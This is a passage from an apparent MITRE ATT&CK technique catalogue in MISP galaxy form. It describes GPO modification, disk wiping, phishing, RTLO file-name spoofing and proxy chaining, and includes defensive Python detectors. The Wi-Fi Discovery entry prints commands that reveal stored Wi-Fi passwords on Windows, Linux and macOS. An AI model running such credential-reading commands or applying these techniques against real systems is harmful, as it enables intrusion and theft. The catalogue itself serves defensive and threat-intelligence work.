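    # Modify-then-revert: the same actor touching the same GPO twice inside the window.
    for (actor, target), times in gpo_mods.items():
        times.sort()
        for earlier, later in zip(times, times[1:]):
            if later - earlier <= REVERT_WINDOW:
                alerts.append(f"possible modify-and-revert of {target} by {actor} "
                              f"({earlier:%H:%M} and {later:%H:%M})")
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_LOG)):
        print(alert)
```

The federation alert fires on the operation alone because a change to a domain's token-signing configuration is rare enough in most tenants to review every time; the GPO rule will need tuning (exclude your change-management accounts and maintenance windows) before the modify-and-revert pairing is useful rather than noisy.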

The tag is: misp-galaxy:mitre-attack-pattern="Domain Policy Modification - T1484"

Table 5942. Table References

Links

http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/

https://adsecurity.org/?p=2716

https://attack.mitre.org/techniques/T1484

https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml

https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/

https://us-cert.cisa.gov/ncas/alerts/aa21-008a

https://wald0.com/?p=179

https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/

https://www.sygnia.co/golden-saml-advisory

Runtime Data Manipulation - T1494

Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1042) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1494"

Table 5943. Table References

Links

https://attack.mitre.org/techniques/T1494

https://content.fireeye.com/apt/rpt-apt38

https://www.justice.gov/opa/press-release/file/1092091/download

Exploit Baseband Vulnerability - T1455

A message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi or other) to the mobile device could exploit a vulnerability in code running on the device.

D. Komaromy and N. Golde demonstrated baseband exploitation of a Samsung mobile device at the PacSec 2015 security conference (Citation: Register-BaseStation).

Weinmann described and demonstrated "the risk of remotely exploitable memory corruptions in cellular baseband stacks." (Citation: Weinmann-Baseband)

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Exploit Baseband Vulnerability - T1455"

Exploit Baseband Vulnerability - T1455 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Exploit via Radio Interfaces - T1477" with estimative-language:likelihood-probability="almost-certain"

Table 5944. Table References

Links

https://attack.mitre.org/techniques/T1455

Event Triggered Execution - T1546

Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)

Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)

Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546"

Table 5945. Table References

Links

https://attack.mitre.org/techniques/T1546

https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9

https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team

https://www.varonis.com/blog/power-automate-data-exfiltration

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Malicious Media Content - T1457

Content of a media (audio or video) file could be designed to exploit vulnerabilities in parsers on the mobile device, as for example demonstrated by the Android Stagefright vulnerability (Citation: Zimperium-Stagefright).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Media Content - T1457"

Malicious Media Content - T1457 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Drive-By Compromise - T1456" with estimative-language:likelihood-probability="almost-certain"

Table 5946. Table References

Links

https://attack.mitre.org/techniques/T1457

Hijack Execution Flow - T1574

Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.

There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.

The tag is: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574"

Table 5947. Table References

Links

https://attack.mitre.org/techniques/T1574

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

Plist File Modification - T1647

Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the <code>info.plist</code> file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple’s Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description)

Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001), [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).

For example, adversaries can add a malicious application path to the ~/Library/Preferences/com.apple.dock.plist file, which controls apps that appear in the Dock. Adversaries can also modify the <code>LSUIElement</code> key in an application’s <code>info.plist</code> file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as <code>LSEnvironment</code>, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)

The tag is: misp-galaxy:mitre-attack-pattern="Plist File Modification - T1647"

Table 5948. Table References

Links

https://attack.mitre.org/techniques/T1647

https://fileinfo.com/extension/plist

https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf

https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/osx_flashback.pdf

Disk Structure Wipe - T1487

Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot systems, targeting specific critical systems as well as a large number of systems in a network to interrupt availability of system and network resources.

Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) if all sectors of a disk are wiped.

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
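What a wiper destroys in the master boot record is concrete enough to check from a single raw sector read: the bootstrap code, the four 16-byte partition entries at offset 446, and the 0x55AA signature at offset 510. The following is an added example written for this page, not code from MITRE or from the cited Shamoon and StoneDrill reports: it parses one 512-byte sector and returns a verdict distinguishing an intact MBR from one that was zeroed or overwritten with other data. The three sectors are constructed, not taken from a real disk.

```python
"""Inspect a 512-byte sector for the structures a wiper overwrites (T1487).

Added example, not code from MITRE or any of the cited reports; the three
sectors below are constructed, not read from a real disk."""
import struct
from typing import Dict, List

BOOT_SIGNATURE = b"\x55\xaa"
PT_OFFSET, ENTRY_SIZE, SECTOR = 446, 16, 512
# Partition entry: status, CHS start (3 bytes), type, CHS end (3 bytes), LBA start, sector count
ENTRY_FMT = "<B3xB3xII"


def parse_partitions(sector: bytes) -> List[Dict]:
    """Decode the four partition table entries, skipping empty ones (type 0)."""
    entries = []
    for i in range(4):
        status, ptype, lba_start, size = struct.unpack_from(ENTRY_FMT, sector, PT_OFFSET + i * ENTRY_SIZE)
        if ptype != 0:
            entries.append({"index": i, "bootable": status == 0x80, "type": ptype,
                            "lba_start": lba_start, "sectors": size})
    return entries


def inspect_mbr(sector: bytes) -> Dict:
    """Verdict on sector 0: intact, zeroed, signature-missing, or no-partitions."""
    if len(sector) != SECTOR:
        raise ValueError("expected exactly one 512-byte sector")
    signature_ok = sector[510:512] == BOOT_SIGNATURE
    bootstrap_blank = not any(sector[:PT_OFFSET])
    table_blank = not any(sector[PT_OFFSET:510])
    partitions = parse_partitions(sector) if signature_ok else []
    if signature_ok and partitions:
        verdict = "intact"
    elif bootstrap_blank and table_blank:
        verdict = "zeroed"              # blank disk, or a wiper that wrote zeros
    elif not signature_ok:
        verdict = "signature-missing"   # overwritten with non-zero data
    else:
        verdict = "no-partitions"
    return {"signature_ok": signature_ok, "bootstrap_blank": bootstrap_blank,
            "partitions": partitions, "verdict": verdict}


def _constructed_mbr() -> bytes:
    """A plausible healthy MBR: some bootstrap bytes, one NTFS partition, valid signature."""
    sector = bytearray(SECTOR)
    sector[0:4] = b"\xfa\x33\xc0\x8e"                   # typical first bytes of bootstrap code
    sector[PT_OFFSET:PT_OFFSET + ENTRY_SIZE] = struct.pack(ENTRY_FMT, 0x80, 0x07, 2048, 204800)
    sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)


HEALTHY = _constructed_mbr()
ZEROED = bytes(SECTOR)
GARBAGE = bytes(range(256)) * 2    # overwrite with arbitrary data: signature bytes become 0xFE 0xFF

if __name__ == "__main__":
    for name, sector in (("healthy", HEALTHY), ("zeroed", ZEROED), ("garbage", GARBAGE)):
        print(name, inspect_mbr(sector)["verdict"])
```

On a live system the sector comes from a raw read of the device (for example `\\.\PhysicalDrive0` on Windows or `/dev/sda` on Linux, both requiring administrative access). GPT disks carry only a protective MBR in sector 0 with a single type 0xEE entry and keep the real partition table in the GPT header at LBA 1 and its backup at the end of the disk, so for those a second check of the `EFI PART` header is needed before calling the structures intact.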

The tag is: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1487"

Table 5949. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/

https://attack.mitre.org/techniques/T1487

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf

https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/

https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html

https://www.symantec.com/connect/blogs/shamoon-attacks

Disk Content Wipe - T1488

Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.

Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Novetta Blockbuster Destructive Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1488"

Table 5950. Table References

Links

https://attack.mitre.org/techniques/T1488

https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

https://www.justice.gov/opa/press-release/file/1092091/download

https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

Modify Authentication Process - T1556

Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on macOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).

Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.

The tag is: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556"

Table 5951. Table References

Links

https://adsecurity.org/?p=2053

https://attack.mitre.org/techniques/T1556

https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/

https://technet.microsoft.com/en-us/library/dn487457.aspx

https://www.secureworks.com/research/skeleton-key-malware-analysis

https://xorrior.com/persistent-credential-theft/

Uninstall Malicious Application - T1576

Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by:

  • Abusing device owner permissions to perform silent uninstallation using device owner API calls.

  • Abusing root permissions to delete files from the filesystem.

  • Abusing the accessibility service. This requires an intent be sent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.

The tag is: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1576"

Table 5952. Table References

Links

https://attack.mitre.org/techniques/T1576

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html

Compromise Application Executable - T1577

Adversaries may modify applications installed on a device to establish persistent access to a victim. These malicious modifications can be used to make legitimate applications carry out adversary tasks when these applications are in use.

There are multiple ways an adversary can inject malicious code into applications. One method is by taking advantage of device vulnerabilities, the most well-known being Janus, an Android vulnerability that allows adversaries to add extra bytes to APK (application) and DEX (executable) files without affecting the file’s signature. By being able to add arbitrary bytes to valid applications, attackers can seamlessly inject code into genuine executables without the user’s knowledge.(Citation: Guardsquare Janus)

Adversaries may also rebuild applications to include malicious modifications. This can be achieved by decompiling the genuine application, merging it with the malicious code, and recompiling it.(Citation: CheckPoint Agent Smith)

Adversaries may also take action to conceal modifications to application executables and bypass user consent. These actions include altering modifications to appear as an update or exploiting vulnerabilities that allow activities of the malicious application to run inside a system application.(Citation: CheckPoint Agent Smith)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Application Executable - T1577"

Table 5953. Table References

Links

https://attack.mitre.org/techniques/T1577

https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/

https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures

Search Closed Sources - T1597

Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)

Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Closed Sources - T1597"

Table 5954. Table References

Links

https://attack.mitre.org/techniques/T1597

https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/

https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/

Phishing for Information - T1598

Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.

All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.

Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)

Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce)

Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Phishing for Information - T1598"

Table 5955. Table References

Links

https://attack.mitre.org/techniques/T1598

https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends

https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide

https://github.com/ryhanson/phishery

https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/

https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/

https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/

https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing

https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/

https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages

https://www.proofpoint.com/us/threat-reference/email-spoofing

https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html

Network Boundary Bridging - T1599

Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.

When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hindrance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.

The tag is: misp-galaxy:mitre-attack-pattern="Network Boundary Bridging - T1599"

Table 5956. Table References

Links

https://attack.mitre.org/techniques/T1599

https://securelist.com/lazarus-threatneedle/100803/

At (Linux) - T1053.001

Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)

An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account.

Adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via <code>sudo</code>.(Citation: GTFObins at)

The tag is: misp-galaxy:mitre-attack-pattern="At (Linux) - T1053.001"

Table 5957. Table References

Links

https://attack.mitre.org/techniques/T1053/001

https://gtfobins.github.io/gtfobins/at/

https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/

https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/

Mark-of-the-Web Bypass - T1553.005

Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen, which compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)

Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW, but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is an NTFS feature, and many container file formats do not support NTFS alternate data streams. After a container file is extracted and/or mounted, the files contained within it may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Mark-of-the-Web Bypass - T1553.005"

Table 5958. Table References

Links

https://attack.mitre.org/techniques/T1553/005

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8

https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7

https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316

https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/

https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/

Right-to-Left Override - T1036.002

Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)

Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.

The tag is: misp-galaxy:mitre-attack-pattern="Right-to-Left Override - T1036.002"

Table 5959. Table References

Links

https://attack.mitre.org/techniques/T1036/002

https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/

https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/

https://securelist.com/zero-day-vulnerability-in-telegram/83800/

Multi-hop Proxy - T1090.003

To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)

In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.

The tag is: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003"

Table 5960. Table References

Links

https://attack.mitre.org/techniques/T1090/003

https://en.wikipedia.org/wiki/Onion_routing

One-Way Communication - T1102.003

Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003"

Table 5961. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1102/003

Wi-Fi Discovery - T1016.002

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.

Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows, names and passwords of all Wi-Fi networks a device has previously connected to may be available through <code>netsh wlan show profiles</code> to enumerate Wi-Fi names and then <code>netsh wlan show profile “Wi-Fi name” key=clear</code> to show a Wi-Fi network’s corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to wlanAPI.dll [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)

On Linux, names and passwords of all Wi-Fi networks a device has previously connected to may be available in files under <code>/etc/NetworkManager/system-connections/</code>.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with <code>security find-generic-password -wa wifiname</code> (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)

The tag is: misp-galaxy:mitre-attack-pattern="Wi-Fi Discovery - T1016.002"

Table 5962. Table References

Links

https://attack.mitre.org/techniques/T1016/002

https://mackeeper.com/blog/find-wi-fi-password-on-mac/

https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/

https://www.binarydefense.com/resources/blog/emotet-evolves-with-new-wi-fi-spreader/

https://www.bleepingcomputer.com/news/security/hackers-steal-wifi-passwords-using-upgraded-agent-tesla-malware/

https://www.geeksforgeeks.org/wi-fi-password-connected-networks-windowslinux/

https://www.malwarebytes.com/blog/news/2020/04/new-agenttesla-variant-steals-wifi-credentials

Drive-by Target - T1608.004

